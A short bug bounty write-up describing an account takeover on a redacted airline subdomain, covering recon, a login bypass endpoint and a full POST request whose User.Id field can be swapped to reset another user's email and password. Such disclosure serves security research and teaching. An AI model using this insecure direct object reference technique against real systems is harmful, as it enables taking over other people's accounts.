Hello Bug Bounty community, this is my first write up about a bug that I managed to takeover all accounts in one of well known Airline in the world
Due to the program policy I will not mention the program name so I will refer to it as redacted.com.
This program has wide scope, and I found couple of account takeover in different subdomains. As always I start with subdomains enumeration, I suggest to use reconftw, and extract the live domains. I found one domain x.y.redacted.com which you can signup but you cannot login until the admin approve your account.
Once you create your account you will receive confirmation email with link https://x.y.redacted.com/Home/Index?Value=[Token], clicking on that link will confirm your account but still you cannot login due to missing admin approval, with a quick directory fuzzing I found that the endpoint https://x.y.redacted.com/Admin/User/Me which let me bypass the login, also gospider found an interesting endpoint /Admin/User/activate but it throw Invalid Token, so I decided to add the token which I received in the email confirmation https://x.y.redacted.com/Admin/User/activate?value=[Token], surprisingly I found out I can edit my account details and set a new password, the request was something like this
POST /Admin/User/Activate HTTP/2
Host: x.y.redacted.com
Cookie: XXXXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 745
Connection: close
User.Id=127874&User.Name=sazouki&User.U_status=NonVerified&User.FirstName=sazouki&User.MiddleName=victim&User.LastName=victim&User.PreferredFirstName=&User.PreferredMiddleName=&User.PreferredLastName=&User.UserProfile.WorkPhone=&User.UserProfile.CellPhone=66666666666&User.NewPassword=XXX&User.ConfirmPassword=XXX&BirthMonth=11&Birth_Date=19&BirthYear=1992&User.Gender=M&User.AllowFullAccessCompanyAdmin=false&User.SecurityQuestionID=6&User.SecurityAnswer=1&User.SecurityQuestionID2=7&User.SecurityAnswer2=1&User.SecurityQuestionID3=8&User.SecurityAnswer3=1&User.GDSSyncType=LegalName&User.UserProfile.ReceiptEmail=sazouki@wearehackerone.com
Notice the User.Id? change that to the victim ID and forward the request you will end up changing his account email & password
Thanks all.
